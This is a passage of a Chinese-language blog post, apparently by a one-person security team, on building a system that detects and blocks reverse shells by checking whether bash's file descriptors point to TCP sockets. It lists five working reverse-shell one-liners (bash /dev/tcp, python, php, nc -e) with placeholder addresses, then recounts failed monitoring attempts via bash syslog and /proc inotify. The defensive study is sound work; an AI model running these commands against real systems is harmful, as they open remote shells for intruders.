當命令注入點已經到手,Webshell已經就緒,nc已經監聽起來了,冒新鮮熱氣兒的Shell唾手可得的那種狂喜,大家還記得嗎?反彈Shell一般是外網滲透的最后一步,也是內網滲透的第一步。反彈Shell對服務器安全乃至內網安全的危害不必多說。
雖然本diao主要是玩Web安全的,可主機安全監控也是要做起來的,誰讓咱是一個人的安全部呢?最近筆者潛心搞了一個反彈Shell攻擊自動發現和阻斷系統,本著技術共享的理念,當然也是為了讓各位大神看看有沒有繞過的可能,把這個技術分享出來,大家共勉。
項目GitHub: Seesaw
0×1 反彈Shell解析
未知攻,焉知防?我們先來分析一下反彈Shell這個不新的滲透技術,看看有什么入手點。反彈Shell顧名思義,有兩個關鍵詞——反彈和Shell。
反彈:利用命令執行/代碼執行/Webshell/Redis未授權訪問寫入crontab等等漏洞,使目標服務器發出主動連接請求,從而繞過防火墻的入站訪問控制規則。
Shell:使服務器Shell進程stdin/stdout/stderr重定向到攻擊端。
常見的反彈Shell姿勢有(詳見文章):
bash -i >& /dev/tcp/ip/port 0>&1
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
php -r 'exec("bash -i >& /dev/tcp/ip/port 0>&1");'
php -r '$sock=fsockopen("ip",port);exec("/bin/bash -i <&3 >&3 2>&3");'
nc -e /bin/bash ip port
通過仔細觀察,我們可以發現這些姿勢無一例外使用了重定向,這也是識別反彈Shell的突破口,且聽筆者細細道來。
我們知道Linux中一切皆文件,正常情況下打開Bash進程時,Bash進程的stdin、stdout、stderr會定向到終端設備文件(例如/dev/pts/0),如下示意圖:
定向到終端設備文件
此時Bash打開的文件描述符為:
Bash打開的文件描述符
可以看到bash進程已經打開了對應的字符設備文件描述符,用于將stdin(0u)/stdout(1u)/stderr(2u)等定向到字符設備。
當出現反彈Shell時,例如最流行的姿勢bash -i >& /dev/tcp/ip/port 0>&1,我們來解析一下這條命令的意思。
bash -i:啟動交互式bash進程
& /dev/tcp/ip/port:將stdout/stderr重定向到與ip:port的tcp套接字中
0>&1:將stdin重定向到stdout中(此時stdout是重定向到套接字的,也就是說stdin也將從套接字中讀取)
綜上,這條命令是為了控制Bash進程,并獲得進程的標準輸出和錯誤輸出,采用重定向技術將stdin/stdout/stderr重定向到了套接字設備中,此時輸入輸出的結構發生了變化,如下示意圖:
輸入輸出的結構發生了變化
通過lsof命令可以看到此時的文件描述符打開情況:
文件描述符打開情況
可以發現stdin(0u)/stdout(1u)/stderr(2u)全都重定向到了TCP套接字中,而且此時進程所屬的用戶也變成了apache(運行Web服務的用戶),當前路徑就是Webshell所在的目錄。
先知社區有不錯的反彈Shell重定向分析:Linux反彈shell(一)文件描述符與重定向、Linux 反彈shell(二)反彈shell的本質。本文借鑒學習了這些文章內容,也正是通過對文章內容的學習啟發了以上我對反彈Shell的特征提取思路,比心。
0×2 總體思路
綜合上述分析,反彈Shell的識別思路便浮出水面:
及時發現Bash進程啟動事件。
檢查Bash進程是否打開了終端設備,是否有主動對外連接。
0×3 失敗嘗試
思路是有了,實現時卻發現困難重重,第一個深坑,就是如何在第一時間捕捉到Shell進程的啟動。為什么要第一時間呢?如果給了黑客短暫的操作窗口,就可能被植入更深層的木馬/rootkit,甚至提權后直接把咱的監控程序干掉,這是絕對不能容忍的。
在這個深坑里,筆者撲騰了好幾回,下面介紹在坑中的各種嘗試,以及最終的成功方法。為啥失敗的經驗還要說呢?其實這些思路本身不壞,只是不太適合我們的項目目標,順便介紹給大家共勉。
Round 1 Sysloghistory of BASH
既然要發現Shell進程,第一個思路是從Bash本身入手,如果Bash執行命令,讓Bash進程自己告訴我。編譯Bash開啟命令history syslog功能,從而獲取bash命令、bash進程pid、uid、pwd之類有用的信息,正好之前做異常命令識別時有過這個經驗,當時也借鑒了一些文章:安全運維之如何將Linux歷史命令記錄發往遠程Rsyslog服務器。
說干就干,下載bash源碼:https://ftp.gnu.org/gnu/bash/。
a. 打開config-top.h 116行注釋,開啟bash syslog history功能:
開啟bash syslog history功能
b. 在bashhist.c 771行和776行自定義需要的syslog內容和格式,比如我最愛的JSON,但由于命令內容容易出現引號、轉義符等導致JSON解析不成功,單獨放在一列:
JSON
c. 修改rsyslog配置/etc/rsyslog.conf,用于本地保存或者發送至遠程日志服務器做分析,并重啟rsyslog服務(service rsyslog restart):
修改rsyslog配置
至此,所有調用Bash執行的命令都被我們記錄下來了:
調用Bash執行的命令
是不是感覺勝利在望了?筆者當時也很興奮。可是在測試中發現如果反彈命令前面帶“sh -c”,就不會被記錄。這是不能容忍的缺陷,可是為啥記錄不到,找不到任何頭緒。沮喪的同時筆者深入思考,這個方法是不適合用于監控Shell進程啟動的,實際執行命令時再檢查就太晚了。
Round 2 proc文件系統
此路不通不要氣餒,再接再厲。我們知道Linux系統有一個proc偽文件系統,記錄著當前內核運行狀態等信息,還有以進程id為名的一堆目錄,里面是與該進程相關的運行信息。能不能從proc文件系統下手,實時監控Shel進程呢?
第一反應是用inotify監控/proc目錄創建目錄的事件,一旦創建新目錄就說明啟動了新進程,再進行相應的檢查。用pyinotify庫寫了一個監控程序:
class BashHandler(pyinotify.ProcessEvent):
| 
